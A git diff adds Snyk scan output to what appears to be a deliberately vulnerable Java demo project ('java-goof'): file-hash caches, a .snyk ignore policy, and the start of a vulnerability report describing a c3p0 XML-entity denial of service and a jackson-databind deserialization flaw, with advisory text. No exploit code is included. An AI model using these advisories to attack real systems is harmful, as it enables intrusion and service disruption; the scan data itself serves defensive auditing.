9068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3ac
f8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repos
itory/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a18
03b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cf
eef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"]} \ No newline at end of file diff --git a/todolist-goof/output.json b/todolist-goof/output.json new file mode 100644 index 0000000000..fbf0ee8434 --- /dev/null +++ b/todolist-goof/output.json 
@@ -0,0 +1,47 @@ +{ + "name": "io.github.snyk:todolist-mvc", + "version": "0.0.1-SNAPSHOT", + "dependencies": { + "javax.xml.bind:jaxb-api": { + "name": "javax.xml.bind:jaxb-api", + "version": "2.3.0" + }, + "com.sun.xml.bind:jaxb-core": { + "name": "com.sun.xml.bind:jaxb-core", + "version": "2.3.0" + }, + "com.sun.xml.bind:jaxb-impl": { + "name": "com.sun.xml.bind:jaxb-impl", + "version": "2.3.0" + } + }, + "type": "maven", + "packageFormatVersion": "mvn:0.0.1" +} +{ + "vulnerabilities": [], + "ok": true, + "dependencyCount": 3, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": {} + }, + "packageManager": "maven", + "projectId": "8fdce6f6-814a-4eef-8578-c7f918af3dd7", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": false, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.github.snyk:todolist-mvc", + "foundProjectCount": 3, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof/todolist-goof" +} diff --git a/todolist-goof/todolist-core/.dccache b/todolist-goof/todolist-core/.dccache new file mode 100644 index 0000000000..5eeeb16434 --- /dev/null +++ b/todolist-goof/todolist-core/.dccache 
@@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/D
ocuments/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/ser
vice/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"]} \ No newline at end of file diff --git a/todolist-goof/todolist-web-struts/.snyk b/todolist-goof/todolist-web-struts/.snyk new file mode 100644 index 0000000000..34ab14c18b --- /dev/null +++ b/todolist-goof/todolist-web-struts/.snyk @@ -0,0 +1,7 @@ +# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities. +version: v1.25.0 +ignore: + SNYK-WOLFILATEST-DOCKER-7569130: + - '*': + reason: None given + expires: '2020-06-19T20:36:54.553Z' diff --git a/todolist-goof/todolist-web-struts/json.json b/todolist-goof/todolist-web-struts/json.json new file mode 100644 index 0000000000..c6b8b24de7 --- /dev/null +++ b/todolist-goof/todolist-web-struts/json.json 
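Review bot: The ignore rule for SNYK-WOLFILATEST-DOCKER-7569130 in the new .snyk file carries `reason: None given` and an `expires` value of 2020-06-19, a date already in the past, so the entry is inert and records no accepted-risk decision. A policy file is the audit trail for suppressed findings; either drop the stale entry or give it a real justification and a future expiry, e.g. `reason: '<PLACEHOLDER: why this finding is accepted>'` and `expires: '<PLACEHOLDER: future ISO-8601 date>'`. The `'*'` path also suppresses the finding for every dependency path rather than the one that was triaged, which is worth narrowing. The ID names a Docker/Wolfi finding, which looks out of place in a Maven module's policy — worth confirming it was meant for this target.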
@@ -0,0 +1,37955 @@ +{ + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": 
"2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + 
"packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "high", + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + 